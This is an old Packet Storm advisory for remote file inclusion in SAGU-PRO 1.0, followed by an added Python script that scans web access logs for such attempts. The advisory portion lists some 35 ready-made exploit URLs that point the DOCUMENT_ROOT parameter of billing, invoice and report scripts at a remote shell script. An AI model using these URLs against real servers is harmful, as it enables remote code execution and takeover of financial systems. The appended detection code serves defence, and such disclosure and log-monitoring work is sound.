SAGU-PRO 1.0 Remote File Inclusion

2010-04-06T00:00:00
ID PACKETSTORM:88095
Type packetstorm
Reporter mat
Modified 2010-04-06T00:00:00

Description

                                        
`
SAGU-PRO v1.0 Multiple Remote File Include Vulnerability  
Script: http://gulbf.com.br/?q=node/145  
Author: mat  
Mail: rahmat_punk@hotmail.com  
  
//-----------------------------------------------------------------------------------------------------------+  
http://[target]/[path]/cliente/ver_imagem.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/importar_pgtos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/up_pgtos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/ver_pgtos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/boletounibanco.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/bb/boleto_bb.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/bradesco06/boleto_bradesco.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/cef/boleto_cef.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/hsbc/boleto_hsbc.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/itau/boleto_itau.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/real57/boleto_real.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/recibo/recibo.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/boleto/santader_banespa_102/boleto_santander_banespa.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/cc/up_fluxo.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/cc/importar_fluxos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/cc/ver_fluxos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/financeiro/cc/post/altera_contacorrente.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/clientes_ativos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/clientes_data_ativacao.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/clientes_geral.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/clientes_suspensos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/clientes_valores_cobranca.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/clientes_vencto.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/prev_outros_servicos.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/prev_pacte_naveg.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/fpdf/resumo_log_pacote_conexao.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/graf_chamados_atendente.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/graf_evolucao_instalacoes_anual.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/graf_evolucao_instalacoes_mensal.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/graf_mensalidades_geradas_mensal.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/graf_visao_chamados.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/pre_graf_chamados_atendente.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/pre_graf_evolucao_instalacoes_mensal.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/pre_graf_mensalidades_geradas_mensal.php?DOCUMENT_ROOT=http://[shellscript]  
http://[target]/[path]/graficos/pre_graf_visao_chamados.php?DOCUMENT_ROOT=http://[shellscript]  
//-----------------------------------------------------------------------------------------------------------+  
  
Greetings: All Hackerz  
`
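
An added detection example, not part of the original advisory: the Python below scans web-server access-log lines for requests that set the `DOCUMENT_ROOT` query parameter listed above to a URL, including percent-encoded and double-encoded values. The log lines, the `/sagu` install path, the `files.example` host and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request part of a "combined" access-log line, and a value that starts with a
# URL scheme or stream wrapper (http://, ftp://, php://, data:).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:)", re.IGNORECASE)
PARAM = "document_root"  # parameter name from the advisory, compared case-insensitively

# Constructed sample lines; the /sagu path and files.example host are assumptions.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Apr/2010:10:00:01 +0000] "GET /sagu/fpdf/clientes_geral.php'
    '?DOCUMENT_ROOT=http://files.example/s.txt HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [06/Apr/2010:10:00:02 +0000] "GET /sagu/cliente/ver_imagem.php'
    '?id=7 HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.5 - - [06/Apr/2010:10:00:03 +0000] "GET /sagu/financeiro/ver_pgtos.php'
    '?DOCUMENT_ROOT=http%253A%252F%252Ffiles.example%252Fs.txt HTTP/1.1" 200 0 "-" "-"',
    '192.0.2.12 - - [06/Apr/2010:10:00:04 +0000] "GET /sagu/graficos/graf_visao_chamados.php'
    '?DOCUMENT_ROOT=/var/www HTTP/1.1" 200 10 "-" "-"',
]


def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding, e.g. http%253A -> http%3A -> http:."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_lines):
    """Return (client_ip, script_path, value) for requests setting DOCUMENT_ROOT to a URL."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = fully_unquote(value)
            if fully_unquote(name).lower() == PARAM and REMOTE_RE.match(value):
                hits.append((m.group("ip"), path, value))
    return hits


if __name__ == "__main__":
    print(*find_rfi_attempts(SAMPLE_LOG), sep="\n")
```

Only GET query strings are inspected here; a parameter sent in a POST body or cookie does not appear in a standard access log and needs request-body logging or a WAF rule to catch.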